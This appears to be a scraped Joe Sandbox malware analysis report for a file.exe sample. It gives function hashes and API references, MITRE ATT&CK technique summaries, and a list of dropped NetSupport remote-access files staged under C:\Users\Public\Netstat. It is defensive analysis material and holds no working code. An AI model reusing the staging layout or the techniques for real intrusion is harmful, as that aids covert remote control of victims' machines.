Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340

Function 1105DD10 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 1105DD4D

Part of subcall function 1116364B: strtoxl.LIBCMT ref: 1116366C

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: __wcstoi64strtoxl
String ID:
API String ID: 910016052-0
Opcode ID: d261918410b5f9a7b38597d7a13bdfb59ca036f11ad90983dad614380adff32c
Instruction ID: 254cfc0c4d222f30174c23c79f68bb227ffa76286089f7af02d48a6939310364
Opcode Fuzzy Hash: d261918410b5f9a7b38597d7a13bdfb59ca036f11ad90983dad614380adff32c
Instruction Fuzzy Hash: 10014F35A00109ABC700DEA8D945FAFB7B8DF98709F104059ED05AB280D671BE14C7B1

Function 111672E3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

__waccess_s.LIBCMT ref: 111672EE

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: __waccess_s
String ID:
API String ID: 4272103461-0
Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540

Function 11163FED Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 11163FFA

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA

Function 00AB1000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_NSMClient32@8.PCICL32(?,?,?,00AB10A2,00000000), ref: 00AB100B

Memory Dump Source

Source File: 00000006.00000002.3993626943.0000000000AB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000006.00000002.3993579084.0000000000AB0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ab0000_shv.jbxd

Yara matches

Similarity

API ID: Client32@8
String ID:
API String ID: 433899448-0
Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
Instruction ID: a294f78159dc7447ec9662f46ba14642bb0997d36ab7ce3af6c3385538507bdb
Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
Instruction Fuzzy Hash: 01B092B212438D9B8714EE98E951CBB339CAA98600B400809BD0543282CA61FC60A671

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Netstat\HTCTL32.DLL

C:\Users\Public\Netstat\NSM.LIC

C:\Users\Public\Netstat\PCICHEK.DLL

C:\Users\Public\Netstat\PCICL32.DLL

C:\Users\Public\Netstat\TCCTL32.DLL

C:\Users\Public\Netstat\client32.ini

C:\Users\Public\Netstat\msvcr100.dll

C:\Users\Public\Netstat\netsup.bat

C:\Users\Public\Netstat\nskbfltr.inf

C:\Users\Public\Netstat\pcicapi.dll

C:\Users\Public\Netstat\remcmdstub.exe

C:\Users\Public\Netstat\shv.exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loca[1].htm

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre